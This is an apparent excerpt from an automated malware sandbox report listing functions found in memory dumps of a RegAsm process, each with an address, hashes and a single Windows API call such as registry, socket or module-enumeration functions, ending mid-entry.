Opcode ID: 8dab1c40a6f8f26ee73e348273a4ee2fa6146ac9317db518641633659271efe5
Instruction ID: 43b711d73c1c73787d30e7ff56e8dc601ed719ba63ba0af9b859a47a919c86e9
Opcode Fuzzy Hash: 8dab1c40a6f8f26ee73e348273a4ee2fa6146ac9317db518641633659271efe5
Instruction Fuzzy Hash: 7C21D1B1500304AFFB31DF65CC85FAAFBACEF04720F14885AEA489A181D674A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00F71496, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 00F7152A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 49ae495c86ac7ea85009f97f4c8b58234de90e62bb95af2af30098976e401d16
Instruction ID: 49ae02800f46d03adeeecd17f38ccc2c8140f22d6e29d8a1ea202cf1dfe30c47
Opcode Fuzzy Hash: 49ae495c86ac7ea85009f97f4c8b58234de90e62bb95af2af30098976e401d16
Instruction Fuzzy Hash: 1E2191B2504744AFE7228F25DC45F67FFA8EF45320F08849AED459B152D374E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A120, Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32(?,00000EB4,?,?), ref: 1DB3A1C2

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: e75999c3ae5f201dede231ea423df1c9035f229e14305ad58c79f0e762c72285
Instruction ID: f9079494029f88e399ac50f7ba396ef38be8865a76c36afe42be41e210fb8513
Opcode Fuzzy Hash: e75999c3ae5f201dede231ea423df1c9035f229e14305ad58c79f0e762c72285
Instruction Fuzzy Hash: 3221BF7140D3C06FD7128B358C51BA2BFB4EF47620F1981DBD8C48F193D225A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B55D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 1DB3B5EE

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 269e3ff62606e81c7b96865e65c09486bdfe3b9ff9191141a21257f44e6060cf
Instruction ID: ad1516281a846204cbcc6a37d663125306c319fd9a2b4427f52740e8ebfd273e
Opcode Fuzzy Hash: 269e3ff62606e81c7b96865e65c09486bdfe3b9ff9191141a21257f44e6060cf
Instruction Fuzzy Hash: 1A2186B15053846FE712CF25DC44F66BFB8EF45310F0884AAE945DB156D364E948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B474, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 1DB3B4FE

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 8bda490b8e337288540d6ae49db69ff8fee900bf69e96acf5395ac489f1c1e71
Instruction ID: d133dd0cf5233de4f2d7b8458c38a398c5de05ff8eca677197e38a3195cb8cd3
Opcode Fuzzy Hash: 8bda490b8e337288540d6ae49db69ff8fee900bf69e96acf5395ac489f1c1e71
Instruction Fuzzy Hash: A521B2715093806FEB128F25DC45B56BFB8EF06320F0884ABE985DF152C265A848CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B654, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1DB3B6FA

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 2685095629ced66224aa0f69621da5245253345abb1a688b128e1f830b2d99ed
Instruction ID: b7f390316b3744bd11d00054d7041764bd2a8d054aae89192b44739c70a71554
Opcode Fuzzy Hash: 2685095629ced66224aa0f69621da5245253345abb1a688b128e1f830b2d99ed
Instruction Fuzzy Hash: 9E21AD715093C06FD7128B65CC55B66BFB4EF87610F0984DBD8848B1A3D624A909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F725E8, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72671

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 7c040f335a54b986b911daa6448e287728d11cfadd5a701b9bac265e138532f6
Instruction ID: 271040baaf96c671e16e86b6749a0d0fe1f83bb57a2c7d765931002d55ff53c1
Opcode Fuzzy Hash: 7c040f335a54b986b911daa6448e287728d11cfadd5a701b9bac265e138532f6
Instruction Fuzzy Hash: 1421B271505380AFEB228F25DC44F67BFB8EF06310F0884ABE9459B152D334A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F71AB5, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 00F71B4A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 14bbbc9fb668d9514d79cb59478dd8e28cf0cd499a5a79cf993ba66d126013f7
Instruction ID: f13a9cba03d5a0925cde09ab1252b57a8fed76ecb0bffd1444afb7cadb3ac8c8
Opcode Fuzzy Hash: 14bbbc9fb668d9514d79cb59478dd8e28cf0cd499a5a79cf993ba66d126013f7
Instruction Fuzzy Hash: F4219171509780AFE722CF65DC44F66FFB8EF05320F08859EE9858B192D375A809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F713C4, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EB4,?,?), ref: 00F7146A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: f90e39ba376dfcd2e00dff2f3689690a3800c06e9e0290696823f02d365367be
Instruction ID: 04d5bbe56bce28cf52dd72e7056a4d5a8cf355912bd7f34ada196b236a8c2e2b
Opcode Fuzzy Hash: f90e39ba376dfcd2e00dff2f3689690a3800c06e9e0290696823f02d365367be
Instruction Fuzzy Hash: 2321716550E3C06FC3138B358C55A22BFB4EF87610F1D81DFD8848B5A3D225A91AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00F72076, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 00F72101

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 9c64bace5ae8cbaa7710d70b8d0a79b9658daa896158025f19dc9d7f0e13a547
Instruction ID: e6e340841384e95db7d0947b67d62eeff90404fd7b0bace228cd3387b47edbf1
Opcode Fuzzy Hash: 9c64bace5ae8cbaa7710d70b8d0a79b9658daa896158025f19dc9d7f0e13a547
Instruction Fuzzy Hash: AD2171B1509380AFE722CB25DC45F66FFA8EF05320F08849AE9858B252D375E905C761

Uniqueness

Uniqueness Score: -1.00%

Function 00F70C7C, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F70D11

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: ed24267e339a08b478c5414e185c9c6357ce948303ae5e49976cb26f86dc63dc
Instruction ID: 3604ac459bebd7cd5000b58544eba8b1feee4dca73113230d2e9e69e70659077
Opcode Fuzzy Hash: ed24267e339a08b478c5414e185c9c6357ce948303ae5e49976cb26f86dc63dc
Instruction Fuzzy Hash: 4221F8B55087806FE7138B25DC44BA3BFA8EF46730F0884DBED849B197D624A905C771

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B2C4, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DB3B35E

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3ccf332fa29e138dff9470ffcc8a54e3ba09b2bd2f3cc0ed4c8b04202db631c0
Instruction ID: 056e02848baf06a2c2293af27300bd617e5b645ca454bed911e8f201359902e3
Opcode Fuzzy Hash: 3ccf332fa29e138dff9470ffcc8a54e3ba09b2bd2f3cc0ed4c8b04202db631c0
Instruction Fuzzy Hash: A921C8755093C06FD3138B259C51B62BFB4EF87A10F0981DBE9848B653D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00F704F0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 00F7058B

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c5e03bd3ea101b075aed6501c646da125735eb212f783976ad45e77cd79f8b03
Instruction ID: f35815afde02a2c9de62a854e3c180a52b8acdce08607905924a6eb0a2563b66
Opcode Fuzzy Hash: c5e03bd3ea101b075aed6501c646da125735eb212f783976ad45e77cd79f8b03
Instruction Fuzzy Hash: D021C8711493806FE7228B15CC45F66BFB8DF06324F1880DAE9845F193C264A949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F71EE6, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 00F71F57

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: d950cfb24b85963c4977432771528e77dd68a71314e0fa10ca4fbce786f4c4a4
Instruction ID: acd333a056894acadd11e6e8160358eb3271062a360d87493bbe15694edc1de4
Opcode Fuzzy Hash: d950cfb24b85963c4977432771528e77dd68a71314e0fa10ca4fbce786f4c4a4
Instruction Fuzzy Hash: 1B21A772600304AFEB20DF29DC45FA7BB9CEF04720F14846AED44DB542D774E8098A72

Uniqueness

Uniqueness Score: -1.00%

Function 00F70BA6, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00F70C25

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 07b5d7a8fee404d6284711a94f277ed50eb6d5264489f4b368664976593c5140
Instruction ID: 47af540d0b2c21da257ba48f7dc46cc3b1467d29df7a410af195d41d1748bca3
Opcode Fuzzy Hash: 07b5d7a8fee404d6284711a94f277ed50eb6d5264489f4b368664976593c5140
Instruction Fuzzy Hash: 59219271500740AFEB22CF65DD44B66FBE8EF04320F14856AEE498B652D775E804DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F72A3A, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72AC3

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 3bb8fe1ee5080d24c7f3eb612fe48e648121e07a2d2a5b30d5c13f60ac4406d1
Instruction ID: 74883250ffe29e4aabb68567f9c81ef7783f4d6de9a6fdcc2c3d1b0168a2e8aa
Opcode Fuzzy Hash: 3bb8fe1ee5080d24c7f3eb612fe48e648121e07a2d2a5b30d5c13f60ac4406d1
Instruction Fuzzy Hash: B12174B15093846FE7228F659C84B56BFB8EF46310F0884DBE9849F193D274A908C762

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3A90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DB3A989

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5ae862f3c4b67227b751c83f799a499139ec5886df930a6f0f9eeb142b5532f4
Instruction ID: fac4f020bab1ccbeaa58385ddbe12aba11ec27ced727780e9fc392c13ed21b3b
Opcode Fuzzy Hash: 5ae862f3c4b67227b751c83f799a499139ec5886df930a6f0f9eeb142b5532f4
Instruction Fuzzy Hash: CD21C272500704BFE7218F55CC84F6BFBACEF08720F14855AE9459B641D634E5058A72

Uniqueness

Uniqueness Score: -1.00%

Function 00F72DD4, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72E69

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 1a2d1cf77a63bb2577f21ab9ef439bfe61b893a095787daf652ec5f1123bc86f
Instruction ID: 273a3f4dab5d046cac3f0569e2a5b4e1a9749ec73c7055139d7cd9714f0b37f4
Opcode Fuzzy Hash: 1a2d1cf77a63bb2577f21ab9ef439bfe61b893a095787daf652ec5f1123bc86f
Instruction Fuzzy Hash: 4B21B6B14093846FDB228F15DC45F66FFB8EF46314F09849BE9845B153C275A908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F714B6, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 00F7152A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 58ea1673d6640247cdbca2da45a7c3f7e5a1a82c97a9d4e8f12f2b89505ee1c1
Instruction ID: 75f352845dbd4787de37ce066483ea070aba5b5c6185766bba97012ffb150648
Opcode Fuzzy Hash: 58ea1673d6640247cdbca2da45a7c3f7e5a1a82c97a9d4e8f12f2b89505ee1c1
Instruction Fuzzy Hash: AA21F6B2900304AFEB218F19DC45F66FBA8EF44320F18846AED459B145D374E8088A72

Uniqueness

Uniqueness Score: -1.00%

Function 00F70E2E, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F70EAD

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: f75e960f22b2c9a3adbd2833c75c66d1f0462286e190d7ecdb9e5305889bcea3
Instruction ID: 6fccedb45526bf3339e7505ebfe4e5b2b726cacf266bfa5f933558a8f66cd762
Opcode Fuzzy Hash: f75e960f22b2c9a3adbd2833c75c66d1f0462286e190d7ecdb9e5305889bcea3
Instruction Fuzzy Hash: 7F21C3B2404344AFEB22CF55DC44FA7BFA8EF45720F0488AAFD449B152C275A808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00F72D06, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72D8A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: bba72ec06c258bc38e0d2c1ed30252887465a85b27433b834b7bc59026d317ed
Instruction ID: de0a64d9fbe9aa2867fe16b5fbebb030eb6b6f9cca05a168e659d23c4844bb69
Opcode Fuzzy Hash: bba72ec06c258bc38e0d2c1ed30252887465a85b27433b834b7bc59026d317ed
Instruction Fuzzy Hash: 99217FB24043846FE722CF65DD84F97BFA8EF45320F0884ABE9449B152D234E948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3ACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1DB3AD6A

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5507e59a2fd4d956924f4cbe8531ebca0dad16367516da4e1034fe0dfbf2b2be
Instruction ID: bda3a241e2280f5f66002a2667463337ae13f887818e92d8d106c619ef06dc77
Opcode Fuzzy Hash: 5507e59a2fd4d956924f4cbe8531ebca0dad16367516da4e1034fe0dfbf2b2be
Instruction Fuzzy Hash: E4217FB65093805FD7528B65DC85B93BFA8EF02211F0984EAE885CF263D234D808C762

Uniqueness

Uniqueness Score: -1.00%

Function 00F72B46, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F72BC1

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: be7d81979133455fa9a3a78217e7b2c18b6a6c90a8feea8cf1c6c3f42aecc34f
Instruction ID: 75f06e2349e1ddeccc3ff4aca45266b65cc50814dd23079f7dc89d592643ae3f
Opcode Fuzzy Hash: be7d81979133455fa9a3a78217e7b2c18b6a6c90a8feea8cf1c6c3f42aecc34f
Instruction Fuzzy Hash: A3216A72500704AFEB218F59DC84FA6BBE8EF48720F04846AED498B652D334E804DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F7243A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 00F724AD

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 9216561c015d76d8798436b54fc3bd999b0d3bce8b6404aeac3f917b215ff0b6
Instruction ID: 9d74f08f9049b5df19027ed592076ab29e28db26ed03ac59fa73d4b70ce4945f
Opcode Fuzzy Hash: 9216561c015d76d8798436b54fc3bd999b0d3bce8b6404aeac3f917b215ff0b6
Instruction Fuzzy Hash: 23219271600740AFE760CF69DD45B66FBE8EF04320F18846AED498B242D775E904DA72

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3AA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 1DB3AA8C

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 36e3bd890b79ee6c60bd2456031c6002c518c3de121ecf2f8523e76c757a8283
Instruction ID: 0f676b1e1468d28a69908b4b46ede8d87a679ba430dfa059baf46b749c58f206
Opcode Fuzzy Hash: 36e3bd890b79ee6c60bd2456031c6002c518c3de121ecf2f8523e76c757a8283
Instruction Fuzzy Hash: D221AE72A00344AFE721CF15CD84F63BBECEF04720F14846AE9469B652D724E808CA72

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3AAFB, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1DB3AB7E

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 69ee35c692baee2daf92e5b19731fb7be3ec5d1e55b4a7102090ab2143702d2d
Instruction ID: ab14de556dec015342e9c1cec203ac7c52bdc91a09b1399fbbe01b407de416e5
Opcode Fuzzy Hash: 69ee35c692baee2daf92e5b19731fb7be3ec5d1e55b4a7102090ab2143702d2d
Instruction Fuzzy Hash: 8821A5715497806FD3128B25DC41F72BFB4EF87620F0981DAED848B653D234A915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F715C2, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F71634

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c9266a3ca9a292375f34590c1911126cf0cb1e270adaf4b5f3c1199db1a65fbb
Instruction ID: 9d0fe147da129b1b420e22cf4d99566e6cd3dabb9645e3047dea8e4273a7929e
Opcode Fuzzy Hash: c9266a3ca9a292375f34590c1911126cf0cb1e270adaf4b5f3c1199db1a65fbb
Instruction Fuzzy Hash: 002163B1600304AFEB21DF59DC44F67BBA8EF04720F18846AED49DB656D774E808DA72

Uniqueness

Uniqueness Score: -1.00%

Function 00F72EA6, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00F72F2A

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: cf1e36742b7922abd3bd90190c66620709812fe89aedd1ee432587f84e56dce0
Instruction ID: 2d5e52a4e6ee026135c96f973e8a1076cd5ad78869bf5aab4e76246ca2fe5693
Opcode Fuzzy Hash: cf1e36742b7922abd3bd90190c66620709812fe89aedd1ee432587f84e56dce0
Instruction Fuzzy Hash: 1C2190754093809FDB228F65D884A92FFF4EF06320F0984DEE9858F563D375A809DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F718DB, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 00F7195C

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 19bd212d0d732db4c2a1fe8a25f82642a2af999c16b83df501d72ffb012dba8b
Instruction ID: d8e83c2bb65336ef532cbde3cca1378f7118c28fa46501021223f2505dd49ec7
Opcode Fuzzy Hash: 19bd212d0d732db4c2a1fe8a25f82642a2af999c16b83df501d72ffb012dba8b
Instruction Fuzzy Hash: 2B2193715083846FEB128B15DC44B56FFB8EF46320F0884DAE9849B153C265A949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F72096, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 00F72101

Memory Dump Source

Source File: 00000008.00000002.1726262787.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f70000_RegAsm.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 73873d0b3e599421bdaa15b2d313963d75e07d9a2bfb9c51cae1643d16914cb1
Instruction ID: 6166f1f992c062b4e40a70212027c4135c37a2c5d25b6b9fc3f429e4d6116218
Opcode Fuzzy Hash: 73873d0b3e599421bdaa15b2d313963d75e07d9a2bfb9c51cae1643d16914cb1
Instruction Fuzzy Hash: F221A5B1604340AFE761DF65DD85B66FBE8EF04320F14C46AED498B242D775E805CA72

Uniqueness

Uniqueness Score: -1.00%

Function 1DB3B58A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,540391D1,00000000,00000000,00000000,00000000), ref: 1DB3B5EE

Memory Dump Source

Source File: 00000008.00000002.1730957458.000000001DB3A000.00000040.00000001.sdmp, Offset: 1DB3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1db3a000_RegAsm.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 409a82683c2bf990ee9083afed0a9a90197a739902db8f43b819b97611b15f83
Instruction ID: 88522ea9742eec537c0f79410fdd31004b95b7c0a7c986b2c42f907337173f69
Opcode Fuzzy Hash: 409a82683c2bf990ee9083afed0a9a90197a739902db8f43b819b97611b15f83
Instruction Fuzzy Hash: DE11A2B1600300AFEB11CF19DC84F6AFBA8EF44720F04846AED49CB256D774E404CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00F71ADE, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 00F71B4A

Memory Dump Source

